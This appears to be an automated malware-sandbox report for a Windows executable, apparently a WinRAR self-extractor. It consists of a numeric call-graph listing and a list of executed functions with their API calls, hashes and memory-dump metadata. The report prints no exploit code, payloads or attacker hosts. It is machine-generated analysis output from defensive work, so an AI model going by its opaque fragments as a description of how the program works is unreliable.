25498 4894b 25497->25498 25498->25373 25500 418ff 25499->25500 25501 418a7 25499->25501 25500->25467 25502 418d0 25501->25502 25509 476c9 76 API calls __vswprintf_c_l 25501->25509 25504 6506e 22 API calls 25502->25504 25506 418f0 25504->25506 25505 418c6 25510 4773a 75 API calls 25505->25510 25506->25500 25511 4773a 75 API calls 25506->25511 25509->25505 25510->25502 25511->25500 25513 4e282 __EH_prolog 25512->25513 25514 5fd0e 27 API calls 25513->25514 25515 4e2c5 25514->25515 25516 5fd0e 27 API calls 25515->25516 25517 4e2e9 25516->25517 25517->25475 25519 55c3e __EH_prolog 25518->25519 25520 5fd0e 27 API calls 25519->25520 25521 55c5a 25520->25521 25522 488d2 25521->25522 25524 5213f 80 API calls 25521->25524 25522->25482 25524->25522 25526 4908c __EH_prolog 25525->25526 25554 413f8 25526->25554 25528 490a8 25529 490b9 25528->25529 25713 4b1b2 25528->25713 25533 490f0 25529->25533 25564 41ad3 25529->25564 25532 490ec 25532->25533 25583 42032 25532->25583 25705 41641 25533->25705 25537 49192 25587 4922e 25537->25587 25541 491f1 25541->25533 25592 4424d 25541->25592 25604 492a6 25541->25604 25545 4b946 7 API calls 25546 49119 25545->25546 25546->25537 25546->25545 25717 4d4b2 CompareStringW _wcslen 25546->25717 25548 4b95b 25547->25548 25552 4b989 25548->25552 25984 4ba74 25548->25984 25550 4b96b 25551 4b970 FindClose 25550->25551 25550->25552 25551->25552 25552->25483 25553->25486 25555 413fd __EH_prolog 25554->25555 25556 4e278 27 API calls 25555->25556 25557 41437 25556->25557 25558 414ab 25557->25558 25559 5fd0e 27 API calls 25557->25559 25719 4c1d7 25558->25719 25561 41498 25559->25561 25561->25558 25563 4642d 43 API calls 25561->25563 25562 41533 _abort 25562->25528 25563->25558 25565 41add __EH_prolog 25564->25565 25577 41c63 25565->25577 25578 41b30 25565->25578 25737 413d9 25565->25737 25567 41c9e 25740 41397 74 API calls 25567->25740 25570 4424d 115 API calls 25574 41ce9 25570->25574 25571 41cab 25571->25570 25571->25577 25572 41d31 25576 41d64 25572->25576 25572->25577 25741 41397 74 API calls 25572->25741 25574->25572 25575 4424d 115 API calls 25574->25575 25575->25574 25576->25577 25581 4b0f0 79 API calls 25576->25581 25577->25532 25578->25567 25578->25571 25578->25577 25579 4424d 115 API calls 25580 41db5 25579->25580 25580->25577 25580->25579 25581->25580 25582 4b0f0 79 API calls 25582->25578 25585 42037 __EH_prolog 25583->25585 25584 42068 25584->25546 25585->25584 25755 41a7e 25585->25755 25901 4e375 25587->25901 25589 4923e 25905 526d1 GetSystemTime SystemTimeToFileTime 25589->25905 25591 491ac 25591->25541 25718 52e84 72 API calls 25591->25718 25593 4425d 25592->25593 25594 44259 25592->25594 25603 4b0f0 79 API calls 25593->25603 25594->25541 25595 4426f 25596 44298 25595->25596 25597 4428a 25595->25597 25907 42eb6 115 API calls 3 library calls 25596->25907 25598 442ca 25597->25598 25906 43943 103 API calls 3 library calls 25597->25906 25598->25541 25601 44296 25601->25598 25908 42544 74 API calls 25601->25908 25603->25595 25605 492b0 __EH_prolog 25604->25605 25610 492ee 25605->25610 25615 4971d Concurrency::cancel_current_task 25605->25615 25927 59c7d 117 API calls 25605->25927 25607 4a16b 25608 4a170 25607->25608 25609 4a1a3 25607->25609 25608->25615 25956 48655 166 API calls 25608->25956 25609->25615 25957 59c7d 117 API calls 25609->25957 25610->25607 25613 4930f 25610->25613 25610->25615 25613->25615 25909 466bf 25613->25909 25615->25541 25616 49525 25616->25615 25623 49649 25616->25623 25930 48f4b 38 API calls 25616->25930 25618 493e5 25618->25616 25928 4b5b6 57 API calls 3 library calls 25618->25928 25621 4958c 25929 68868 26 API calls 2 library calls 25621->25929 25625 4b946 7 API calls 25623->25625 25627 496bb 25623->25627 25625->25627 25626 49915 25937 4e489 96 API calls 25626->25937 25915 489a8 25627->25915 25630 4974c 25632 497a5 25630->25632 25931 44710 27 API calls 2 library calls 25630->25931 25632->25615 25633 498d4 Concurrency::cancel_current_task 25632->25633 25656 498cd 25632->25656 25932 487db 41 API calls 25632->25932 25933 4e489 96 API calls 25632->25933 25934 4237a 74 API calls 25632->25934 25935 48f08 98 API calls 25632->25935 25635 49970 25633->25635 25938 484ff 50 API calls 2 library calls 25633->25938 25636 49a1a 25635->25636 25642 4999b 25635->25642 25639 49a6c 25636->25639 25654 49a25 25636->25654 25646 49a0c 25639->25646 25941 48d93 119 API calls 25639->25941 25640 49a6a 25647 4a7df 80 API calls 25640->25647 25641 4a128 25648 4a7df 80 API calls 25641->25648 25643 49ac8 25642->25643 25642->25646 25649 4b4a1 3 API calls 25642->25649 25643->25641 25644 49b33 25643->25644 25942 4aafc 25643->25942 25652 4beea 27 API calls 25644->25652 25646->25640 25646->25643 25647->25615 25648->25615 25650 499d3 25649->25650 25650->25646 25939 4a4e8 97 API calls 25650->25939 25655 49b82 25652->25655 25654->25640 25940 48b5c 123 API calls 25654->25940 25659 4beea 27 API calls 25655->25659 25936 4237a 74 API calls 25656->25936 25677 49b98 25659->25677 25663 49b21 25946 47931 77 API calls 25663->25946 25665 49c6d 25666 49e63 25665->25666 25667 49cc9 25665->25667 25669 49e75 25666->25669 25670 49e89 25666->25670 25691 49d02 25666->25691 25668 49ce1 25667->25668 25675 49d80 25667->25675 25672 49d28 25668->25672 25679 49cf0 25668->25679 25673 4a453 137 API calls 25669->25673 25671 54556 75 API calls 25670->25671 25674 49ea2 25671->25674 25672->25691 25949 4827b 111 API calls 25672->25949 25673->25691 25678 541ff 137 API calls 25674->25678 25950 48f4b 38 API calls 25675->25950 25676 49c44 25676->25665 25947 4ac7c 82 API calls 25676->25947 25677->25665 25677->25676 25685 4aa5a 79 API calls 25677->25685 25678->25691 25948 4237a 74 API calls 25679->25948 25683 49e54 25683->25541 25685->25676 25686 49dc5 25687 49de1 25686->25687 25688 49dfd 25686->25688 25686->25691 25951 48017 85 API calls 25687->25951 25952 4a1f0 103 API calls __EH_prolog 25688->25952 25691->25683 25697 49fa8 25691->25697 25953 4237a 74 API calls 25691->25953 25693 4a0b3 25693->25641 25694 4b8c6 3 API calls 25693->25694 25696 4a10e 25694->25696 25695 4a061 25922 4b012 25695->25922 25696->25641 25954 4237a 74 API calls 25696->25954 25697->25641 25697->25693 25697->25695 25921 4b179 SetEndOfFile 25697->25921 25700 4a0a8 25702 4a860 77 API calls 25700->25702 25702->25693 25703 4a11e 25955 47851 76 API calls 25703->25955 25706 41653 25705->25706 25708 41665 Concurrency::cancel_current_task 25705->25708 25706->25708 25971 416b2 25706->25971 25709 42111 26 API calls 25708->25709 25710 41694 25709->25710 25974 4e319 25710->25974 25714 4b1c9 25713->25714 25715 4b1d3 25714->25715 25983 4778f 78 API calls 25714->25983 25715->25529 25717->25546 25718->25541 25720 4c1ed _abort 25719->25720 25725 4c0b3 25720->25725 25732 4c094 25725->25732 25727 4c128 25728 42111 25727->25728 25729 4211c 25728->25729 25730 4212b 25728->25730 25736 4136b 26 API calls Concurrency::cancel_current_task 25729->25736 25730->25562 25733 4c0a2 25732->25733 25734 4c09d 25732->25734 25733->25727 25735 42111 26 API calls 25734->25735 25735->25733 25736->25730 25742 41822 25737->25742 25740->25577 25741->25576 25743 41834 25742->25743 25750 413f2 25742->25750 25744 4185d 25743->25744 25752 476c9 76 API calls __vswprintf_c_l 25743->25752 25746 6506e 22 API calls 25744->25746 25748 4187a 25746->25748 25747 41853 25753 4773a 75 API calls 25747->25753 25748->25750 25754 4773a 75 API calls 25748->25754 25750->25582 25752->25747 25753->25744 25754->25750 25756 41a8e 25755->25756 25757 41a8a 25755->25757 25759 419c5 25756->25759 25757->25584 25760 419d7 25759->25760 25761 41a14 25759->25761 25762 4424d 115 API calls 25760->25762 25767 446b7 25761->25767 25763 419f7 25762->25763 25763->25757 25770 446c0 25767->25770 25768 4424d 115 API calls 25768->25770 25769 41a35 25769->25763 25772 41f30 25769->25772 25770->25768 25770->25769 25784 52101 25770->25784 25773 41f3a __EH_prolog 25772->25773 25792 442da 25773->25792 25775 41f61 25776 41822 78 API calls 25775->25776 25777 41fe8 25775->25777 25778 41f78 25776->25778 25777->25763 25820 4190b 78 API calls 25778->25820 25780 41f90 25782 41f9c _wcslen 25780->25782 25821 52ea2 MultiByteToWideChar 25780->25821 25822 4190b 78 API calls 25782->25822 25785 52108 25784->25785 25786 52123 25785->25786 25790 476c4 RaiseException CallUnexpected 25785->25790 25787 52134 SetThreadExecutionState 25786->25787 25791 476c4 RaiseException CallUnexpected 25786->25791 25787->25770 25790->25786 25791->25787 25793 442e4 __EH_prolog 25792->25793 25794 44316 25793->25794 25795 442fa 25793->25795 25796 44571 25794->25796 25800 44342 25794->25800 25848 41397 74 API calls 25795->25848 25868 41397 74 API calls 25796->25868 25799 44305 25799->25775 25800->25799 25823 54556 25800->25823 25802 4444e 25833 4beea 25802->25833 25803 443bf 25804 443c3 25803->25804 25850 4252a 78 API calls 25803->25850 25804->25802 25819 443ba 25804->25819 25851 4e489 96 API calls 25804->25851 25806 44391 25806->25803 25806->25804 25807 443af 25806->25807 25849 41397 74 API calls 25807->25849 25812 44461 25813 444f7 25812->25813 25814 444e7 25812->25814 25852 541ff 25813->25852 25837 4a453 25814->25837 25817 444f5 25817->25819 25861 4237a 74 API calls 25817->25861 25862 53516 25819->25862 25820->25780 25821->25782 25822->25777 25824 54575 ___std_exception_copy 25823->25824 25825 5456b 25823->25825 25827 545fb 25824->25827 25828 546a5 25824->25828 25832 5461f _abort 25824->25832 25869 4773a 75 API calls 25825->25869 25870 54489 75 API calls 3 library calls 25827->25870 25871 63190 RaiseException 25828->25871 25831 546d1 25832->25806 25834 4bef8 25833->25834 25836 4bf02 25833->25836 25835 5fd0e 27 API calls 25834->25835 25835->25836 25836->25812 25838 4a45d __EH_prolog 25837->25838 25872 489ff 25838->25872 25841 413d9 78 API calls 25842 4a470 25841->25842 25875 4e54c 25842->25875 25844 4a483 25845 4a4cc 25844->25845 25847 4e54c 132 API calls 25844->25847 25884 4e738 97 API calls __InternalCxxFrameHandler 25844->25884 25845->25817 25847->25844 25848->25799 25849->25819 25850->25804 25851->25802 25853 54231 25852->25853 25854 54208 25852->25854 25860 54225 25853->25860 25899 566a4 137 API calls 2 library calls 25853->25899 25855 54227 25854->25855 25857 5421d 25854->25857 25854->25860 25898 5737e 132 API calls 25855->25898 25885 57dac 25857->25885 25860->25817 25861->25819 25863 53520 25862->25863 25864 53539 25863->25864 25867 5354d 25863->25867 25900 521e6 86 API calls 25864->25900 25866 53540 Concurrency::cancel_current_task 25866->25867 25868->25799 25869->25824 25870->25832 25871->25831 25873 4c5f9 GetVersionExW 25872->25873 25874 48a04 25873->25874 25874->25841 25881 4e562 __InternalCxxFrameHandler 25875->25881 25876 4e6d2 25877 4e706 25876->25877 25878 4e503 6 API calls 25876->25878 25879 52101 SetThreadExecutionState RaiseException 25877->25879 25878->25877 25882 4e6c9 25879->25882 25880 59c7d 117 API calls 25880->25881 25881->25876 25881->25880 25881->25882 25883 4bfd5 91 API calls 25881->25883 25882->25844 25883->25881 25884->25844 25886 5477d 75 API calls 25885->25886 25887 57dbd __InternalCxxFrameHandler 25886->25887 25887->25887 25888 4e54c 132 API calls 25887->25888 25889 581ce 25887->25889 25892 524bf 81 API calls 25887->25892 25893 54fe1 132 API calls 25887->25893 25894 5227f 88 API calls 25887->25894 25895 58223 132 API calls 25887->25895 25896 54aec 98 API calls 25887->25896 25897 5887f 137 API calls 25887->25897 25888->25887 25890 56389 98 API calls 25889->25890 25891 581de __InternalCxxFrameHandler 25890->25891 25891->25860 25892->25887 25893->25887 25894->25887 25895->25887 25896->25887 25897->25887 25898->25860 25899->25860 25900->25866 25902 4e385 25901->25902 25904 4e38c 25901->25904 25903 4aa5a 79 API calls 25902->25903 25903->25904 25904->25589 25905->25591 25906->25601 25907->25601 25908->25598 25910 466cf 25909->25910 25958 465db 25910->25958 25913 46702 25914 4673a 25913->25914 25963 4c68f CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25913->25963 25914->25618 25916 489bd 25915->25916 25917 489f5 25916->25917 25969 47911 74 API calls 25916->25969 25917->25615 25917->25626 25917->25630 25919 489ed 25970 41397 74 API calls 25919->25970 25921->25695 25923 4b032 25922->25923 25924 4b023 25922->25924 25926 4b0af SetFileTime 25923->25926 25924->25923 25925 4b029 FlushFileBuffers 25924->25925 25925->25923 25926->25700 25927->25610 25928->25621 25929->25616 25930->25623 25931->25632 25932->25632 25933->25632 25934->25632 25935->25632 25936->25633 25937->25633 25938->25635 25939->25646 25940->25640 25941->25646 25943 4ab05 GetFileType 25942->25943 25944 49b0b 25942->25944 25943->25944 25944->25644 25945 4237a 74 API calls 25944->25945 25945->25663 25946->25644 25947->25665 25948->25691 25949->25691 25950->25686 25951->25691 25952->25691 25953->25697 25954->25703 25955->25641 25956->25615 25957->25615 25964 464d8 25958->25964 25960 465fc 25960->25913 25962 464d8 2 API calls 25962->25960 25963->25913 25965 464e2 25964->25965 25967 465ca 25965->25967 25968 4c68f CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25965->25968 25967->25960 25967->25962 25968->25965 25969->25919 25970->25917 25980 420ed 26 API calls Concurrency::cancel_current_task 25971->25980 25973 416c0 25975 4e32a Concurrency::cancel_current_task 25974->25975 25981 4bd6e 86 API calls Concurrency::cancel_current_task 25975->25981 25977 4e35c 25982 4bd6e 86 API calls Concurrency::cancel_current_task 25977->25982 25979 4e367 25980->25973 25981->25977 25982->25979 25983->25715 25985 4ba81 25984->25985 25986 4bb00 FindNextFileW 25985->25986 25987 4ba9a FindFirstFileW 25985->25987 25989 4bb0b GetLastError 25986->25989 25994 4bae2 25986->25994 25988 4baa9 25987->25988 25987->25994 25990 4cf12 GetCurrentDirectoryW 25988->25990 25989->25994 25991 4bab9 25990->25991 25992 4bad7 GetLastError 25991->25992 25993 4babd FindFirstFileW 25991->25993 25992->25994 25993->25992 25993->25994 25994->25550 25996 4a436 _abort 25995->25996 25998 4a403 25995->25998 25996->25492 25997 4b450 3 API calls 25997->25998 25998->25996 25998->25997 25999->25382 26000->25388 26001->25388 26002->25391 26003->25396 26005 4b1b2 78 API calls 26004->26005 26006 4208f 26005->26006 26007 41ad3 115 API calls 26006->26007 26010 420ac 26006->26010 26008 4209c 26007->26008 26008->26010 26011 41397 74 API calls 26008->26011 26010->25405 26010->25406 26011->26010 26057 5a470 GetClientRect 26012 6a470 26020 6bdbf 26012->26020 26015 6a484 26017 6a48c 26018 6a499 26017->26018 26028 6a4a0 11 API calls 26017->26028 26021 6bca8 _abort 5 API calls 26020->26021 26022 6bde6 26021->26022 26023 6bdfe TlsAlloc 26022->26023 26026 6bdef 26022->26026 26023->26026 26024 60bcc _ValidateLocalCookies 5 API calls 26025 6a47a 26024->26025 26025->26015 26027 6a3e9 20 API calls 2 library calls 26025->26027 26026->26024 26027->26017 26028->26015 26058 6947a 55 API calls _free 26081 60583 20 API calls 26082 69180 52 API calls 3 library calls 24073 5ee82 24074 5ee8f 24073->24074 24081 4f917 24074->24081 24082 4f927 24081->24082 24093 4f948 24082->24093 24085 44a00 24116 449d3 24085->24116 24088 5c5f8 PeekMessageW 24089 5c613 GetMessageW 24088->24089 24090 5c64c 24088->24090 24091 5c629 IsDialogMessageW 24089->24091 24092 5c638 TranslateMessage DispatchMessageW 24089->24092 24091->24090 24091->24092 24092->24090 24099 4ecb0 24093->24099 24096 4f945 24096->24085 24097 4f96b LoadStringW 24097->24096 24098 4f982 LoadStringW 24097->24098 24098->24096 24104 4ebec 24099->24104 24101 4eccd 24102 4ece2 24101->24102 24112 4ecf0 26 API calls 24101->24112 24102->24096 24102->24097 24105 4ec04 24104->24105 24111 4ec84 _strncpy 24104->24111 24107 4ec28 24105->24107 24113 530c5 WideCharToMultiByte 24105->24113 24110 4ec59 24107->24110 24114 4f8b1 50 API calls __vsnprintf 24107->24114 24115 673c1 26 API calls 3 library calls 24110->24115 24111->24101 24112->24102 24113->24107 24114->24110 24115->24111 24117 449ea __vswprintf_c_l 24116->24117 24120 67132 24117->24120 24123 651f5 24120->24123 24124 6521d 24123->24124 24127 65235 24123->24127 24140 6a63b 20 API calls _abort 24124->24140 24126 6523d 24142 65794 24126->24142 24127->24124 24127->24126 24128 65222 24141 65009 26 API calls _abort 24128->24141 24133 60bcc _ValidateLocalCookies 5 API calls 24135 449f4 SetDlgItemTextW 24133->24135 24134 652c5 24151 65b44 51 API calls 3 library calls 24134->24151 24135->24088 24138 652d0 24152 65817 20 API calls _free 24138->24152 24139 6522d 24139->24133 24140->24128 24141->24139 24143 657b1 24142->24143 24149 6524d 24142->24149 24143->24149 24153 6a365 GetLastError 24143->24153 24145 657d2 24173 6a946 38 API calls __cftof 24145->24173 24147 657eb 24174 6a973 38 API calls __cftof 24147->24174 24150 6575f 20 API calls 2 library calls 24149->24150 24150->24134 24151->24138 24152->24139 24154 6a381 24153->24154 24155 6a37b 24153->24155 24159 6a3d0 SetLastError 24154->24159 24176 6c146 24154->24176 24175 6be6b 11 API calls 2 library calls 24155->24175 24159->24145 24160 6a39b 24183 6a4ba 24160->24183 24163 6a3b0 24163->24160 24165 6a3b7 24163->24165 24164 6a3a1 24166 6a3dc SetLastError 24164->24166 24190 6a1d0 20 API calls _abort 24165->24190 24191 69f44 38 API calls _abort 24166->24191 24168 6a3c2 24171 6a4ba _free 20 API calls 24168->24171 24172 6a3c9 24171->24172 24172->24159 24172->24166 24173->24147 24174->24149 24175->24154 24182 6c153 _abort 24176->24182 24177 6c193 24193 6a63b 20 API calls _abort 24177->24193 24178 6c17e RtlAllocateHeap 24180 6a393 24178->24180 24178->24182 24180->24160 24189 6bec1 11 API calls 2 library calls 24180->24189 24182->24177 24182->24178 24192 68cac 7 API calls 2 library calls 24182->24192 24184 6a4c5 RtlFreeHeap 24183->24184 24185 6a4ee __dosmaperr 24183->24185 24184->24185 24186 6a4da 24184->24186 24185->24164 24194 6a63b 20 API calls _abort 24186->24194 24188 6a4e0 GetLastError 24188->24185 24189->24163 24190->24168 24192->24182 24193->24180 24194->24188 24209 5f58b 24210 5f552 24209->24210 24212 5f837 24210->24212 24238 5f595 24212->24238 24214 5f847 24215 5f8a4 24214->24215 24224 5f8c8 24214->24224 24216 5f7d5 DloadReleaseSectionWriteAccess 6 API calls 24215->24216 24217 5f8af RaiseException 24216->24217 24218 5fa9d 24217->24218 24218->24210 24219 5f940 LoadLibraryExA 24220 5f9a1 24219->24220 24221 5f953 GetLastError 24219->24221 24222 5f9b3 24220->24222 24225 5f9ac FreeLibrary 24220->24225 24226 5f966 24221->24226 24227 5f97c 24221->24227 24223 5fa11 GetProcAddress 24222->24223 24233 5fa6f 24222->24233 24229 5fa21 GetLastError 24223->24229 24223->24233 24224->24219 24224->24220 24224->24222 24224->24233 24225->24222 24226->24220 24226->24227 24228 5f7d5 DloadReleaseSectionWriteAccess 6 API calls 24227->24228 24230 5f987 RaiseException 24228->24230 24231 5fa34 24229->24231 24230->24218 24231->24233 24234 5f7d5 DloadReleaseSectionWriteAccess 6 API calls 24231->24234 24247 5f7d5 24233->24247 24235 5fa55 RaiseException 24234->24235 24236 5f595 ___delayLoadHelper2@8 6 API calls 24235->24236 24237 5fa6c 24236->24237 24237->24233 24239 5f5c7 24238->24239 24240 5f5a1 24238->24240 24239->24214 24255 5f63e 24240->24255 24242 5f5a6 24244 5f5c2 24242->24244 24258 5f767 24242->24258 24263 5f5c8 GetModuleHandleW GetProcAddress GetProcAddress 24244->24263 24246 5f810 24246->24214 24248 5f7e7 24247->24248 24249 5f809 24247->24249 24250 5f63e DloadReleaseSectionWriteAccess 3 API calls 24248->24250 24249->24218 24251 5f7ec 24250->24251 24252 5f804 24251->24252 24253 5f767 DloadProtectSection 3 API calls 24251->24253 24266 5f80b GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24252->24266 24253->24252 24264 5f5c8 GetModuleHandleW GetProcAddress GetProcAddress 24255->24264 24257 5f643 24257->24242 24259 5f77c DloadProtectSection 24258->24259 24260 5f7b7 VirtualProtect 24259->24260 24261 5f782 24259->24261 24265 5f67d VirtualQuery GetSystemInfo 24259->24265 24260->24261 24261->24244 24263->24246 24264->24257 24265->24260 24266->24249 26062 41095 44 API calls 26085 60597 29 API calls _abort 26121 60390 46 API calls __RTC_Initialize 26104 5d2a0 91 API calls _swprintf 26122 613a0 51 API calls 2 library calls 24382 5fba8 24383 5fbb2 24382->24383 24384 5f837 ___delayLoadHelper2@8 14 API calls 24383->24384 24385 5fbbf 24384->24385 24386 5f1ab 14 API calls ___delayLoadHelper2@8 24388 4acb4 24391 4acbe 24388->24391 24389 4ae0c SetFilePointer 24390 4ae29 GetLastError 24389->24390 24393 4acd4 24389->24393 24390->24393 24391->24389 24392 4ade5 24391->24392 24391->24393 24395 4aa5a 24391->24395 24392->24389 24396 4aa73 24395->24396 24399 4b0f0 24396->24399 24400 4b115 24399->24400 24401 4b102 24399->24401 24402 4aaa5 24400->24402 24404 4b128 SetFilePointer 24400->24404 24401->24402 24408 477e0 77 API calls 24401->24408 24402->24392 24404->24402 24405 4b144 GetLastError 24404->24405 24405->24402 24406 4b14e 24405->24406 24406->24402 24409 477e0 77 API calls 24406->24409 24408->24400 24409->24402 24410 410b5 24415 4642d 24410->24415 24414 410c4 24416 46437 __EH_prolog 24415->24416 24424 4c9b8 GetCurrentProcess GetProcessAffinityMask 24416->24424 24418 46444 24425 504c5 24418->24425 24420 4649b 24429 4663c GetCurrentProcess GetProcessAffinityMask 24420->24429 24422 410ba 24423 601c2 29 API calls 24422->24423 24423->24414 24424->24418 24426 504cf __EH_prolog 24425->24426 24430 4482f 41 API calls 24426->24430 24428 504eb 24428->24420 24429->24422 24430->24428 24431 5f2b1 24432 5f1b5 24431->24432 24433 5f837 ___delayLoadHelper2@8 14 API calls 24432->24433 24433->24432 26064 5fcb1 48 API calls _unexpected 26087 5bdb0 73 API calls 26065 6b4b0 71 API calls _free 26066 718b0 IsProcessorFeaturePresent 26088 6c1c8 27 API calls 4 library calls 26089 5e5d0 70 API calls 26126 60fd0 RaiseException _com_error::_com_error CallUnexpected 26070 63cdb 38 API calls 4 library calls 26106 52edb GetCPInfo IsDBCSLeadByte 26128 5b3e0 GdipDisposeImage GdipFree 26071 638e0 6 API calls 4 library calls 26090 605e0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26129 6b3e0 21 API calls 2 library calls 25120 4b1ea 25121 4b1ff 25120->25121 25122 4b1f8 25120->25122 25123 4b20c GetStdHandle 25121->25123 25130 4b21b 25121->25130 25123->25130 25124 4b273 WriteFile 25124->25130 25125 4b244 WriteFile 25126 4b23f 25125->25126 25125->25130 25126->25125 25126->25130 25128 4b305 25132 47931 77 API calls 25128->25132 25130->25122 25130->25124 25130->25125 25130->25126 25130->25128 25131 4763a 78 API calls 25130->25131 25131->25130 25132->25122 26109 6cef0 GetCommandLineA GetCommandLineW 26033 413fd 43 API calls 2 library calls 26131 573fe 137 API calls __InternalCxxFrameHandler

                                                            Executed Functions

                                                            Function 0005EEDC Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00051B5C: GetModuleHandleW.KERNEL32(kernel32), ref: 00051B75
                                                              • Part of subcall function 00051B5C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051B87
                                                              • Part of subcall function 00051B5C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BB8
                                                              • Part of subcall function 0005B62D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005B635
                                                              • Part of subcall function 0005BCEB: OleInitialize.OLE32(00000000), ref: 0005BD04
                                                              • Part of subcall function 0005BCEB: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD3B
                                                              • Part of subcall function 0005BCEB: SHGetMalloc.SHELL32(0008A460), ref: 0005BD45
                                                            • GetCommandLineW.KERNEL32 ref: 0005EF1B
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005EF45
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0005EF56
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0005EFA7
                                                              • Part of subcall function 0005EBAE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005EBC4
                                                              • Part of subcall function 0005EBAE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005EC00
                                                              • Part of subcall function 0005072B: _wcslen.LIBCMT ref: 0005074F
                                                            • CloseHandle.KERNEL32(00000000), ref: 0005EFAE
                                                            • GetModuleFileNameW.KERNEL32(00000000,000A0CC0,00000800), ref: 0005EFC8
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,000A0CC0), ref: 0005EFD4
                                                            • GetLocalTime.KERNEL32(?), ref: 0005EFDF
                                                            • _swprintf.LIBCMT ref: 0005F01E
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005F033
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0005F03A
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0005F051
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C870,00000000), ref: 0005F0A2
                                                            • Sleep.KERNEL32(?), ref: 0005F0D0
                                                            • DeleteObject.GDI32 ref: 0005F109
                                                            • DeleteObject.GDI32(?), ref: 0005F119
                                                            • CloseHandle.KERNEL32 ref: 0005F15C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3014515783-3710569615
                                                            • Opcode ID: 59a943ba911fb5bcb1657fc80f262c61d8ad08eca8bfae91d7d18d252f684307
                                                            • Instruction ID: a7d73f8df57034d4d66d688306e08a9716edd4b1497ad916f92bb17a158db0cf
                                                            • Opcode Fuzzy Hash: 59a943ba911fb5bcb1657fc80f262c61d8ad08eca8bfae91d7d18d252f684307
                                                            • Instruction Fuzzy Hash: DA61E871900741ABF310AB61DC49FBB7BDCBB46746F040425FA85A2192EF7C9948CB62
                                                            Function 0005B6A2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 663 5b6a2-5b6bf FindResourceW 664 5b6c5-5b6d6 SizeofResource 663->664 665 5b7bb 663->665 664->665 667 5b6dc-5b6eb LoadResource 664->667 666 5b7bd-5b7c1 665->666 667->665 668 5b6f1-5b6fc LockResource 667->668 668->665 669 5b702-5b717 GlobalAlloc 668->669 670 5b7b3-5b7b9 669->670 671 5b71d-5b726 GlobalLock 669->671 670->666 672 5b7ac-5b7ad GlobalFree 671->672 673 5b72c-5b74a call 62c10 671->673 672->670 677 5b7a5-5b7a6 GlobalUnlock 673->677 678 5b74c-5b76e call 5b606 673->678 677->672 678->677 683 5b770-5b778 678->683 684 5b793-5b7a1 683->684 685 5b77a-5b78e GdipCreateHBITMAPFromBitmap 683->685 684->677 685->684 686 5b790 685->686 686->684
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C7CD,00000066), ref: 0005B6B5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6CC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6E3
                                                            • LockResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6F2
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B70D
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B71E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0005B7A6
                                                              • Part of subcall function 0005B606: GdipAlloc.GDIPLUS(00000010), ref: 0005B60C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B787
                                                            • GlobalFree.KERNEL32(00000000), ref: 0005B7AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
